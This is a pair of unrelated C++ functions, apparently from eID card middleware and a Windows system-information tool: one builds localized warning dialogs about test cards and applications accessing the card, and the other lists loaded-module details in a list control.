std::wstring CLang::GetMessageFromID(DlgMessageID messageID) { std::wstring csMessage=L""; unsigned char separator; #ifdef WIN32 separator = '\\'; #else separator = '/'; #endif switch( messageID ) { case DLG_MESSAGE_TESTCARD: csMessage+=GETSTRING_DLG(TheRootCertificateIsNotCorrect); csMessage+=L"\n"; csMessage+=GETSTRING_DLG(ThisMayBeATestCard); csMessage+=L"\n\n"; csMessage+=GETSTRING_DLG(DoYouWantToAcceptIt); break; case DLG_MESSAGE_ENTER_CORRECT_CARD: csMessage+=GETSTRING_DLG(PleaseEnterTheCorrectEidCard); break; case DLG_MESSAGE_USER_WARNING: { wchar_t fullpath[PATH_LENGHT]; wcscpy_s(fullpath,PATH_LENGHT,L""); const wchar_t *exename=NULL; wchar_t *partPath = fullpath;//current (sub)folder name wchar_t *nextPartPath = fullpath;//next (sub)folder name wchar_t *startOfLine = fullpath;//start of (part of) path that is not yet copied GetProcessName(fullpath,PATH_LENGHT); if(wcslen(fullpath)==0) { wcscpy_s(fullpath,PATH_LENGHT,GETSTRING_DLG(UnknownApplication)); exename=fullpath; } else { exename=wcsrchr(fullpath,separator); if(exename==NULL) exename=L"???"; else exename++; } csMessage+=GETSTRING_DLG(TheFollowingApplication1IsTrying); csMessage.replace(csMessage.find(L"%1"),2,exename); csMessage+=L"\n\n\n\n\n"; csMessage+=GETSTRING_DLG(PathOfTheApplication); csMessage+=L"\n\n"; nextPartPath=wcschr(partPath,separator); while(nextPartPath != NULL) { nextPartPath++;//skip separator if((nextPartPath-startOfLine)>48) { csMessage+=L"\n"; startOfLine = nextPartPath; } csMessage.append(partPath,(nextPartPath-partPath)); //csMessage+=L" "; partPath = nextPartPath; nextPartPath=wcschr(partPath,separator); } if((wcslen(partPath)+(partPath-startOfLine))>48) { csMessage+=L"\n"; } csMessage+=partPath; //csMessage+=fullpath; } break; case DLG_MESSAGE_SDK35_WARNING: csMessage+=GETSTRING_DLG(OldSDK35Notification); break; case DLG_MESSAGE_NONE: default: break; } return csMessage; }
int SystemModuleInformation::MODULE_INFO::Insert( CSystemInfoListCtrl& list, BOOL bPid, size_t iItem, size_t iItemCount) const { iItem; // use var iItemCount; // use var CString strPID, strProcesName; CString strBase, strLength, strUsage, strFileSize, strVersion, strFilePath; // Get size INT64 i64FileSize = 0; LPCTSTR szFileName = _tcslen(FileFullPath) > 0 ? FileFullPath : FullPath; CFile file; if ( file.Open( szFileName, CFile::modeRead ) ) { i64FileSize = file.GetLength(); file.Close(); } strBase.Format( _T("0x%08IX"), Handle ); strLength.Format( _T("%d"), info.SizeOfImage ); if( me32.GlblcntUsage == 0 ) strUsage.Format( _T("") ); else if( me32.GlblcntUsage == 65535 ) strUsage = LocLoadString(IDS_MODULE_FIXED); else strUsage.Format( _T("%d"), me32.GlblcntUsage ); strFileSize.Format( _T("%I64d"), i64FileSize ); GetModuleVersion( szFileName, strVersion ); strFilePath = FullPath; if( _tcsicmp( FullPath, szFileName ) != 0 ) { strFilePath += _T(" ==> "); strFilePath += FileFullPath; } int sub = 0; int iListItemCount = list.GetItemCount(); int nPos = list.InsertItem( iListItemCount, _T("") ); list.SetItemText( nPos, sub+0, strBase ); list.SetItemText( nPos, sub+1, strLength ); if( bPid ) { strPID.Format( _T("%d"), ProcessId ); list.SetItemText( nPos, sub+2, strPID ); sub++; strProcesName = GetProcessName( ProcessId ); list.SetItemText( nPos, sub+2, strProcesName ); sub++; } list.SetItemText( nPos, sub+2, strUsage ); list.SetItemText( nPos, sub+3, Name ); list.SetItemText( nPos, sub+4, strFileSize ); list.SetItemText( nPos, sub+5, strVersion ); list.SetItemText( nPos, sub+6, strFilePath ); return nPos; }